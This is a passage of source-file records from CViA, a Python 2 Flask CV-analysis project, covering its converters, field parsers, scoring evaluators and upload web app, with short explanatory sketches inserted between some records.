"text": "__author__ = 'siwei'\n\nimport json\nimport os\n\nclass DataStore:\n\n def __init__(self):\n self.root_dir_path = os.path.dirname(os.path.abspath(__file__)) + '/data/'\n self.load()\n\n def save(self, d):\n with open(self.root_dir_path+'data.json', 'w') as f:\n f.write(unicode(json.dumps(d, ensure_ascii=False)))\n\n def load(self):\n with open(self.root_dir_path+'data.json', 'r') as f:\n self.data = json.loads(f.read())\n\n def printData(self):\n print(json.dumps(self.data))\n print self.data['cv'][0]['name']\n\n\n\nif __name__ == \"__main__\":\n x = DataStore()\n \"\"\"\n x.save( json.loads('''{\n \"cv\": [\n {\n \"name\": \"siwei\",\n \"age\": \"23\"\n },\n {\n \"name\": \"jianghao\",\n \"age\": \"24\"\n }\n ]\n}'''))\"\"\"\n x.printData()"
},
{
"alpha_fraction": 0.7301293611526489,
"alphanum_fraction": 0.7301293611526489,
"avg_line_length": 22.565217971801758,
"blob_id": "756ffcb06692bb7d00c9bd7b5874e0022748c296",
"content_id": "1dfca2a3f23c1929ee7e83bd443bb11a093444ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 541,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 23,
"path": "/test_classifier.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvClassifier.Classifier import Classifier\nfrom cvConverter import Converter\nfrom cvParser.Parser import Parser\nimport os\n\n__author__ = 'siwei'\n\nroot_dir_path = os.path.dirname(os.path.abspath(__file__))\n\nconverter = Converter.DocConverter()\nparser = Parser()\n\ncl = Classifier()\ncl.load()\n\nto_classify = [\"cv/simple.doc\"]\nclassified_cv = []\nfor cv in to_classify:\n CV_Text = converter.documentToText(root_dir_path+\"/\"+cv)\n cvobj = parser.convertToObj(CV_Text)\n classified_cv.append((cv, cl.classify(cvobj)))\n\nprint classified_cv"
},
{
"alpha_fraction": 0.5581565499305725,
"alphanum_fraction": 0.5620580315589905,
"avg_line_length": 31.291337966918945,
"blob_id": "20fa6155793430452cd198317cc5bbbc66a0f38f",
"content_id": "f02911b575e56a233128dcd2fffa1f07bc61a8bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4101,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 127,
"path": "/main.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import os\n\nfrom flask import Flask, render_template, request, send_from_directory\nfrom werkzeug import secure_filename\n\nfrom doc_converter import DocConverter\nfrom cvParser.Parser import Parser\nimport Service\nfrom Service import input_requirement, evaluate_cvs, input_weight, input_job_function\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = 'cv/'\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'doc', 'docx'])\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\ndef get_cvs():\n files = os.listdir(os.path.join(app.config['UPLOAD_FOLDER']))\n allowed_files = []\n for filename in files:\n if allowed_file(filename):\n allowed_files.append(app.config['UPLOAD_FOLDER'] + filename)\n return allowed_files\n\[email protected](\"/\", methods=['GET'])\ndef index():\n return render_template('index.html')\n\[email protected](\"/upload\", methods=['GET', 'POST'])\ndef upload():\n # POST\n if request.method == 'POST':\n file = request.files['file']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n print \"Uploaded file\", filename\n\n full_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n print full_path\n file.save(full_path)\n print \"Stored file\", filename\n\n return render_template(\n 'cv.html',\n filename=filename\n )\n\n return render_template('cv.html', filename=None)\n\n # GET\n return render_template('upload.html')\n\[email protected]('/upload/<filename>', methods=['GET'])\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\[email protected]('/upload/all', methods=['GET'])\ndef all_cvs():\n cvs = get_cvs()\n return render_template('cvs.html', cvs=[cv.split('/')[-1] for cv in cvs])\n\[email protected]('/process', methods=['POST'])\ndef process():\n # POST\n if request.method == 'POST':\n def parse(text):\n keywords = []\n for keyword in text.split(','):\n if keyword.strip():\n keywords.append(str(keyword.strip()))\n return keywords\n\n def parse_number(text):\n try:\n number = int(text)\n return number if number >= 1 else 1\n except e:\n return 1\n\n req = {\n 'education': request.form['education'],\n 'skill': {\n 'must': parse(request.form['skill_must']),\n 'good': parse(request.form['skill_good'])\n },\n 'language': {\n 'must': parse(request.form['language_must']),\n 'good': parse(request.form['language_good'])\n },\n 'experience': {\n 'must': parse(request.form['experience_must']),\n 'good': parse(request.form['experience_good'])\n },\n 'other': parse(request.form['other'])\n }\n\n weights = {\n 'education': parse_number(request.form['education_weight']),\n 'skill': parse_number(request.form['skill_weight']),\n 'language': parse_number(request.form['language_weight']),\n 'experience': parse_number(request.form['experience_weight']),\n 'other': parse_number(request.form['other_weight'])\n }\n\n cvs = get_cvs()\n\n input_requirement(req)\n input_weight(weights)\n input_job_function(request.form['job'])\n results = evaluate_cvs(cvs)\n for cv in results:\n detailed_scores = \"\"\n for category in cv['score']:\n detailed_scores += category + \": \" + str(cv['score'][category]) + \"\\n\"\n cv['detailed_scores'] = detailed_scores\n cv['filename'] = cv['cv'].split('/')[-1]\n cv['total'] = round(cv['total'], 1)\n\n results.sort(key=lambda x: -x['total'])\n\n return render_template('result.html', cvs=results)\n\n return render_template('index.html')\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8888)\n"
},
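process() normalises the HTML form before scoring: comma-separated fields become keyword lists and weights are clamped to integers of at least 1. The two helpers' behaviour, shown standalone (simplified slightly from the handler above):

```python
def parse(text):
    # "Python, , Java " -> ['Python', 'Java']: blanks dropped, whitespace trimmed
    return [kw.strip() for kw in text.split(",") if kw.strip()]

def parse_number(text):
    # Non-numeric or sub-1 input falls back to a weight of 1
    try:
        number = int(text)
        return number if number >= 1 else 1
    except ValueError:
        return 1

print(parse("Python, , Java "))                                  # ['Python', 'Java']
print(parse_number("3"), parse_number("abc"), parse_number("0"))  # 3 1 1
```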
{
"alpha_fraction": 0.6818181872367859,
"alphanum_fraction": 0.6818181872367859,
"avg_line_length": 18.375,
"blob_id": "b3debf441ca7b2af78114215ac77b06f27f72892",
"content_id": "27e0fd78d841dff5863f7b56c212299706cc6969",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 8,
"path": "/CVFields/InterestsField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields.Field import Field\n\nclass InterestsField(Field):\n\n def __init__(self,textlist):\n self.interest = textlist"
},
{
"alpha_fraction": 0.6793830990791321,
"alphanum_fraction": 0.6801947951316833,
"avg_line_length": 33.22222137451172,
"blob_id": "bd1f7ccfcf4ff8203d759565506792a8d5d79cca",
"content_id": "42fbd2e46357bc839c738f4ab887a24a529be085",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1232,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 36,
"path": "/cvConverter/Converter.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter.DOCFileConverter import DOCFileConverter\nfrom cvConverter.DOCXFileConverter import DOCXFileConverter\nfrom cvConverter.PDFFileConverter import PDFFileConverter\nfrom cvConverter.TXTFileConveryer import TXTFileConverter\n\n__author__ = 'siwei'\n\nclass DocConverter:\n def __init__(self):\n self.converters = []\n self.add_converters()\n\n def add_converters(self):\n doc_converter = DOCFileConverter()\n self.converters.append(doc_converter)\n docx_converter = DOCXFileConverter()\n self.converters.append(docx_converter)\n txt_converter = TXTFileConverter()\n self.converters.append(txt_converter)\n pdf_converter = PDFFileConverter()\n self.converters.append(pdf_converter)\n\n def get_extension(self, file_name):\n return file_name.split('.')[-1]\n\n def documentToText(self, file_name):\n extension = self.get_extension(file_name)\n for converter in self.converters:\n if converter.get_type() == extension:\n converter.set_path(file_name)\n return converter.convert()\n\nif __name__ == \"__main__\":\n\n x = DocConverter()\n print x.documentToText(\"/Volumes/D/CViA/cv/LinkedIn/YaminiBhaskar.pdf\")\n"
},
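DocConverter holds one converter instance per file type and picks the first whose get_type() matches the file extension. The same dispatch in a compact, dependency-free sketch; a dict lookup replaces the linear scan, and the converter class here is a stand-in, not the repo's:

```python
class TxtConverter:
    type = "txt"
    def convert(self, path):
        with open(path, encoding="utf-8", errors="replace") as f:
            return f.read()

class Dispatcher:
    def __init__(self, converters):
        self.by_ext = {c.type: c for c in converters}  # extension -> converter

    def to_text(self, path):
        ext = path.rsplit(".", 1)[-1]
        converter = self.by_ext.get(ext)
        if converter is None:
            raise ValueError("unsupported file type: " + ext)
        return converter.convert(path)

d = Dispatcher([TxtConverter()])
# d.to_text("cv/simple.txt") would return that file's contents
```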
{
"alpha_fraction": 0.6772152185440063,
"alphanum_fraction": 0.6772152185440063,
"avg_line_length": 16.66666603088379,
"blob_id": "705130ecc14ba8ea9ed03ebc6c6472c78c4008fe",
"content_id": "56b97ead029c493b81235e0d3f461563c65bce42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 9,
"path": "/CVFields/Skill_ExpertiseField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\n\nfrom CVFields.Field import Field\n\nclass Skill_ExpertiseField(Field):\n\n def __init__(self,textlist):\n self.skill = textlist"
},
{
"alpha_fraction": 0.6238095164299011,
"alphanum_fraction": 0.6238095164299011,
"avg_line_length": 18.090909957885742,
"blob_id": "0c1c3c5e460e097cb509b2801545da43c4fb232d",
"content_id": "fda3ee857e57fe681795a5f01aad5dd7d894eac7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 210,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 11,
"path": "/CVFields/ProjectField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\n\nfrom CVFields.Field import Field\n\nclass ProjectField(Field):\n\n def __init__(self,title,date,des):\n self.title = title\n self.date = date\n self.description = des\n"
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.7659574747085571,
"avg_line_length": 14.833333015441895,
"blob_id": "75f3759202a7cf3f844db8926e6936ecd4e551d5",
"content_id": "af95df17d0346b55c2e3858e552db9867f9876dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/CVFields/PublicationField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\n\nfrom CVFields.Field import Field\n\nclass PublicationField(Field):pass"
},
{
"alpha_fraction": 0.45967450737953186,
"alphanum_fraction": 0.4781193435192108,
"avg_line_length": 40.89393997192383,
"blob_id": "5a97add78a5d326e108bbe27335317a465123e84",
"content_id": "0de3259099a83890427a661eb2fd86f9bb3afd17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2765,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 66,
"path": "/cvParser/ExpParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "\nimport re\nimport FieldFactory\n\n__author__ = 'haojiang'\n\n\nclass ExpParser:\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseExp(self,ExpStr):\n ExpList = ExpStr.splitlines()\n dateArr = []\n result = []\n for i in range(0,len(ExpList)):\n if self.MatchExpDate(ExpList[i]):\n dateArr.append(i)\n for i in range(0,len(dateArr)):\n index = dateArr[i]\n if i != len(dateArr)-1:\n if(len(ExpList[index-1].split(\" at \")) == 2):\n title = ExpList[index-1].split(\" at \")[0].strip()\n company = ExpList[index-1].split(\" at \")[1].strip()\n else:\n title = ExpList[index-1]\n company = \"\"\n period = ExpList[index].split(\"(\")[1][:len(ExpList[index].split(\"(\")[1])-1]\n description = \"\"\n\n ### Not EMPTY description ###\n if index+1 != dateArr[i+1]-1:\n temp = index+1\n end = dateArr[i+1]-1\n while(temp!=end):\n description = description + ExpList[temp]\n temp+=1\n\n else:\n if(len(ExpList[index-1].split(\" at \")) == 2):\n title = ExpList[index-1].split(\" at \")[0].strip()\n company = ExpList[index-1].split(\" at \")[1].strip()\n else:\n title = ExpList[index-1]\n company = \"\"\n period = ExpList[index].split(\"(\")[1][:len(ExpList[index].split(\"(\")[1])-1]\n description =\"\"\n\n ### Not EMPTY description\n if index+1 != len(ExpList):\n temp=index+1\n end = len(ExpList)\n while(temp!=end):\n description = description + ExpList[temp]\n temp+=1\n result.append(self.factory.produce(\"exp\",title,period,description,company))\n return result\n\n def MatchExpDate(self,text): # <--- Check whether the string is a date string\n if len(text.split(\"(\"))>1 and len(text)<50 and \"-\" in text:\n # From \" May 2013 - May 2015 (2 years)\" extract date.\n first = text.split(\"(\")[0].split(\"-\")[0].strip()\n second = text.split(\"(\")[0].split(\"-\")[1].strip()\n return re.findall(r'(?:January|February|March|April|May|June|July|August|September|October|November|December)\\s\\d{4}', first) !=[] and \\\n (re.findall(r'(?:January|February|March|April|May|June|July|August|September|October|November|December)\\s\\d{4}', second) !=[] or second ==\"Present\")\n else:\n return False"
},
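MatchExpDate accepts a line as an experience date header only when both sides of the dash parse as 'Month YYYY' (or the right side is 'Present') and a parenthesised duration follows. A trimmed, runnable rendering of that check:

```python
import re

MONTH_YEAR = re.compile(
    r'(?:January|February|March|April|May|June|July|August|'
    r'September|October|November|December)\s\d{4}')

def is_period_line(text):
    if "(" not in text or "-" not in text or len(text) >= 50:
        return False
    left, _, right = text.split("(")[0].partition("-")
    left, right = left.strip(), right.strip()
    return bool(MONTH_YEAR.search(left)) and \
           (bool(MONTH_YEAR.search(right)) or right == "Present")

print(is_period_line("May 2013 - May 2015 (2 years)"))        # True
print(is_period_line("September 2015 - Present (2 months)"))  # True
print(is_period_line("Singapore - NUS (campus)"))             # False
```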
{
"alpha_fraction": 0.6143141388893127,
"alphanum_fraction": 0.6163021922111511,
"avg_line_length": 26.88888931274414,
"blob_id": "0aaf4e89c513a0571140ac26fe0bc25c33c2e560",
"content_id": "018ca1fd92d8578770b35e19df14739a02195faa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 503,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 18,
"path": "/cvParser/LanguageParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\nfrom CVFields import LanguageField\n__author__ = 'haojiang'\n\n\n\nclass LanguageParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseLanguage(self,text):\n textList = text.splitlines()\n for i in range(0,len(textList)):\n if \" \" in textList[i] or \"(\" in textList[i] or \")\" in textList[i]:\n textList[i] = \"\"\n textList = filter(None,textList)\n return self.factory.produce(\"language\",textList)\n\n"
},
{
"alpha_fraction": 0.523809552192688,
"alphanum_fraction": 0.523809552192688,
"avg_line_length": 20,
"blob_id": "3b719e51cb5f16a3a50815ecdbc1f28b68d0c18f",
"content_id": "47db59d4c4e070aa2b97675b460cf0977d393e15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/cvStore/__init__.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'siwei'\n"
},
{
"alpha_fraction": 0.48172515630722046,
"alphanum_fraction": 0.49049708247184753,
"avg_line_length": 31.595237731933594,
"blob_id": "842bfebe470e6a5634c936dfd562ee881d2deb82",
"content_id": "8d82ebb658bf99b0b6981ae8763742d4ced50549",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1368,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 42,
"path": "/cvParser/ProjectsParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\n__author__ = 'haojiang'\n\nclass ProjectsParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseProjects(self,text):\n textList = text.splitlines()\n keyIndex = []\n result = []\n for i in range(0,len(textList)):\n if \"Members:\" in textList[i]:\n keyIndex.append(i)\n\n for i in range(0,len(keyIndex)):\n theIndex = keyIndex[i]\n\n # Is not the last one\n if i != len(keyIndex) - 1:\n title = textList[theIndex-2]\n date = textList[theIndex-1]\n description = \"\"\n start = theIndex + 1\n end = keyIndex[i+1]\n for k in range(start,end):\n description = description + textList[k]\n # Is the last one\n else:\n title = textList[theIndex-2]\n date = textList[theIndex-1]\n description = \"\"\n if theIndex + 1 < len(textList):\n start = theIndex + 1\n end = len(textList) - 1\n for k in range(start,end):\n description = description + textList[k]\n\n result.append(self.factory.produce(\"projects\",title.strip(),date.strip(),description.strip()))\n\n return result"
},
{
"alpha_fraction": 0.4776119291782379,
"alphanum_fraction": 0.48187634348869324,
"avg_line_length": 29.29032325744629,
"blob_id": "1bb77e50832bbcf80ea5398f81572b2faf8d2420",
"content_id": "94e57359e3987c8977fb5f58e548165395acc6ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 31,
"path": "/cvEvaluator/SkillEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvEvaluator.BaseEvaluator import BaseEvaluator\n\n__author__ = 'siwei'\n\nclass SkillEvaluator(BaseEvaluator):\n\n def __init__(self):\n BaseEvaluator.__init__(self)\n self.name = \"skill\"\n\n def evaluate(self, req, cv):\n req_skill = req[self.name]\n cv_skill = cv[self.name]\n if req_skill == [] or cv_skill == []:\n return 0\n skill_score = 0\n for pri in req_skill:\n skill_list = req_skill[pri]\n if pri == 'must':\n base_score = 5\n else:\n base_score = 2\n #print \"==============\"\n #print skill_list\n #print cv_skill\n for s in skill_list:\n if s.lower() in (skill.lower() for skill in cv_skill):\n skill_score += base_score\n #print \"++++++ \"+s+\" \"+str(base_score)\n #self.score = skill_score\n return skill_score"
},
{
"alpha_fraction": 0.5270270109176636,
"alphanum_fraction": 0.5270270109176636,
"avg_line_length": 14,
"blob_id": "b77c49e1ed673f7036f2f665e13985dbc297080f",
"content_id": "5ce136a2402fefa0524a7ee142159a0e5b4ad755",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 5,
"path": "/CVFields/Field.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nclass Field:\n def __init__(self):\n pass"
},
{
"alpha_fraction": 0.6520146727561951,
"alphanum_fraction": 0.6520146727561951,
"avg_line_length": 23.81818199157715,
"blob_id": "c82941fb8f54f3f88f38cb32e4d63c96c3ad20d7",
"content_id": "af262936601c488545e054e9147eceba9ba606d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 11,
"path": "/CVFields/CertificationField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from CVFields.Field import Field\n\n__author__ = 'haojiang'\n\nclass CertificationField(Field):\n\n def __init__(self,title, issuedcompany, license, date):\n self.title = title\n self.company = issuedcompany\n self.license = license\n self.date = date\n"
},
{
"alpha_fraction": 0.5511073470115662,
"alphanum_fraction": 0.5613287687301636,
"avg_line_length": 31.63888931274414,
"blob_id": "10b4f37d59b817c2bd7257a802724d2793547374",
"content_id": "fb8d41ba9ea49ca17316f3c898ea1a9212448147",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1174,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 36,
"path": "/cvParser/EduParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\nfrom CVFields import EducationField\n__author__ = 'haojiang'\n\n\n\nclass EduParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseEdu(self,text):\n textList = text.splitlines()\n indexarr = []\n result = []\n for i in range(0,len(textList)):\n if self.iskeysentence(textList[i]):\n indexarr.append(i)\n for i in range(0,len(indexarr)):\n theindex = indexarr[i]\n university = textList[theindex-1].strip()\n degree = textList[theindex].split(\",\")[0].strip()\n major = textList[theindex].split(\",\")[1].strip()\n result.append(self.factory.produce(\"edu\",university,degree,major))\n return result\n\n # To check whether is the \"degree,major,date\" or not\n def iskeysentence(self,str):\n result = False\n target = str.split(\",\")\n if len(target) == 3:\n if len(target[2].split())==3:\n advTarget = target[2].split()\n if advTarget[1] == '-' and advTarget[0].isdigit() and advTarget[2].isdigit():\n result = True\n return result"
},
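iskeysentence looks for the 'degree, major, YYYY - YYYY' line that sits directly under the university name in the exported text. The same test in isolation:

```python
def is_degree_line(line):
    parts = line.split(",")
    if len(parts) != 3:
        return False
    tokens = parts[2].split()  # expect something like ['2012', '-', '2016']
    return (len(tokens) == 3 and tokens[1] == "-"
            and tokens[0].isdigit() and tokens[2].isdigit())

print(is_degree_line("BSc, Computer Science, 2012 - 2016"))  # True
print(is_degree_line("National University of Singapore"))    # False
```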
{
"alpha_fraction": 0.672340452671051,
"alphanum_fraction": 0.672340452671051,
"avg_line_length": 22.600000381469727,
"blob_id": "2e47dd807109d558f18d7198279f86ac1cbbc038",
"content_id": "cc4b8dc89791542ac46bedac327141e9edc64cf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 235,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 10,
"path": "/CVFields/VolunteerField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields.Field import Field\n\nclass VolunteerExpField(Field):\n\n def __init__(self,title,period,description):\n self.title = title\n self.period = period\n self.description = description"
},
{
"alpha_fraction": 0.686274528503418,
"alphanum_fraction": 0.686274528503418,
"avg_line_length": 20.85714340209961,
"blob_id": "5fba6993467e5cef0db31c25332d2b97806b51b1",
"content_id": "61166ebe1f935652ef3c07f0b3c4e3ffc8c0d602",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 306,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 14,
"path": "/cvParser/SkillParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\nfrom CVFields import Skill_ExpertiseField\n__author__ = 'haojiang'\n\n\n\nclass SkillParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseSkill(self,text):\n textList = text.splitlines()\n return self.factory.produce(\"skill\",textList)\n"
},
{
"alpha_fraction": 0.48511165380477905,
"alphanum_fraction": 0.4888337552547455,
"avg_line_length": 27.821428298950195,
"blob_id": "752494236faa2ed12d13213e533b2b54b0fd6125",
"content_id": "87dfabb97417df82d31e8501ce4a01920a6f52be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 806,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 28,
"path": "/cvEvaluator/ExpEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvEvaluator.BaseEvaluator import BaseEvaluator\n\n__author__ = 'siwei'\n\nclass ExpEvaluator(BaseEvaluator):\n\n def __init__(self):\n BaseEvaluator.__init__(self)\n self.name = \"experience\"\n\n def evaluate(self, req, cv):\n req_exp = req[self.name]\n cv_exp = cv[self.name]\n exp_score = 0\n if req_exp == [] or cv_exp == []:\n return exp_score\n for pri in req_exp:\n req_exp_list = req_exp[pri]\n if pri == 'must':\n base_score = 5\n else:\n base_score = 2\n for exp in cv_exp:\n for s in req_exp_list:\n if s.lower() in exp['title'].lower():\n exp_score += base_score\n #self.score = exp_score\n return exp_score"
},
{
"alpha_fraction": 0.47622883319854736,
"alphanum_fraction": 0.4810636639595032,
"avg_line_length": 32.56756591796875,
"blob_id": "1f1f871be0705557623b6602db258cd529a8bce0",
"content_id": "5aa1df6554c3ad7fe8ea3c32ae9bc5aeb510e3c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1241,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 37,
"path": "/cvEvaluator/OtherEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvEvaluator.BaseEvaluator import BaseEvaluator\n\n__author__ = 'siwei'\n\nclass OtherEvaluator(BaseEvaluator):\n\n def __init__(self):\n BaseEvaluator.__init__(self)\n self.name = \"other\"\n\n def evaluate(self, req, cv):\n req_other = req[self.name]\n if req_other == [] or cv == []:\n return 0\n other_score = 0\n base_score = 2\n for s in req_other:\n s = s.lower()\n if len(cv['interest']) > 0:\n if s in (i.lower() for i in cv['interest']):\n other_score += base_score\n if len(cv['project']) > 0:\n for proj in cv['project']:\n if s in proj['title'].lower():\n other_score += base_score\n\n if len(cv['project']) > 0:\n for proj in cv['project']:\n if s.lower() in proj['title'].lower() or s.lower() in proj['description'].lower():\n other_score += base_score\n\n # if s in cvOther['publications'].lower():\n # other_score += base_score\n if s in cv['summary'].lower():\n other_score += base_score\n #self.score = other_score\n return other_score"
},
{
"alpha_fraction": 0.6365614533424377,
"alphanum_fraction": 0.645266592502594,
"avg_line_length": 25.285715103149414,
"blob_id": "227e9b56fc3fd9c765bef279ef8ea5731f2a18ec",
"content_id": "96e4f76c75582f9f97d6e98ec87b570a191b7cf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 919,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 35,
"path": "/train_classifier.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvClassifier.Classifier import Classifier\nfrom cvConverter import Converter\nfrom cvParser.Parser import Parser\nimport pprint\nimport os\n\n__author__ = 'siwei'\n\nroot_dir_path = os.path.dirname(os.path.abspath(__file__))\n\ncvs = [(\"cv/LinkedIn/YaminiBhaskar.pdf\",\"2\"),\n (\"cv/LinkedIn/DonnabelleEmbodo.pdf\",\"3\"),\n (\"cv/LinkedIn/PraveenDeorani.pdf\",\"4\"),\n (\"cv/LinkedIn/RussellOng.pdf\",\"5\"),\n (\"cv/LinkedIn/YaminiBhaskar.pdf\",\"6\")]\n\ntrain_data = []\n\ndef train():\n print \"Converting CV files ...\"\n converter = Converter.DocConverter()\n parser = Parser()\n print \"Parsing CVs...\"\n for cv in cvs:\n CV_Text = converter.documentToText(root_dir_path+\"/\"+cv[0])\n cvobj = parser.convertToObj(CV_Text)\n train_data.append((cvobj, cv[1]))\n\n\n pp = pprint.PrettyPrinter(indent=4)\n #pp.pprint(train_data)\n\n cl = Classifier()\n cl.train(train_data)\n cl.save()"
},
{
"alpha_fraction": 0.5390946269035339,
"alphanum_fraction": 0.5390946269035339,
"avg_line_length": 19.33333396911621,
"blob_id": "994ba6c0e32aa8d5fa6402dbe2538e2537a959c1",
"content_id": "de293cbd6979c2aaa28d22ed386bda3e42211413",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 12,
"path": "/cvConverter/BaseConverter.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'siwei'\n\nclass BaseConverter:\n def __init__(self):\n self.type = \"-\"\n\n def set_path(self, file_name):\n self.path = file_name\n self.text = file_name + \"\\n\"\n\n def get_type(self):\n return self.type"
},
{
"alpha_fraction": 0.47475457191467285,
"alphanum_fraction": 0.4803646504878998,
"avg_line_length": 37.56756591796875,
"blob_id": "db1a7d1276a41ceab98aa177a60e14fbf751c67f",
"content_id": "8ac334ef6d0a1089a76b8a4714e1a4fe37a2b57c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1426,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 37,
"path": "/cvParser/CertificationsParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\n__author__ = 'haojiang'\n\nclass Certifications:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseCertifications(self,text):\n monthlist = [\"January\",\"February\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\"\n ,\"September\",\"October\",\"November\",\"December\"]\n textList = text.splitlines()\n result = []\n for i in range(0,len(textList),2):\n # print textList[i+1].split()\n title = textList[i]\n company = \"\"\n license = \"\"\n date = \"\"\n nextline = textList[i+1].split()\n if len(nextline) > 2:\n companyIndex = len(nextline)\n licenseIndex = len(nextline)\n for k in range(0,len(nextline)):\n if nextline[k] == \"License\":\n companyIndex = k - 1\n if nextline[k] in monthlist:\n licenseIndex = k - 1\n if k < companyIndex:\n company = company + \" \" + nextline[k]\n elif k > licenseIndex:\n date = date + \" \" + nextline[k]\n else:\n license = license + \" \" + nextline[k]\n\n result.append(self.factory.produce(\"certifications\",title.strip(),company.strip(),license.strip(),date.strip()))\n return result"
},
{
"alpha_fraction": 0.5758183002471924,
"alphanum_fraction": 0.5791583061218262,
"avg_line_length": 32.28888702392578,
"blob_id": "e252a930ed08742c3a1e598bb400d56f2b923703",
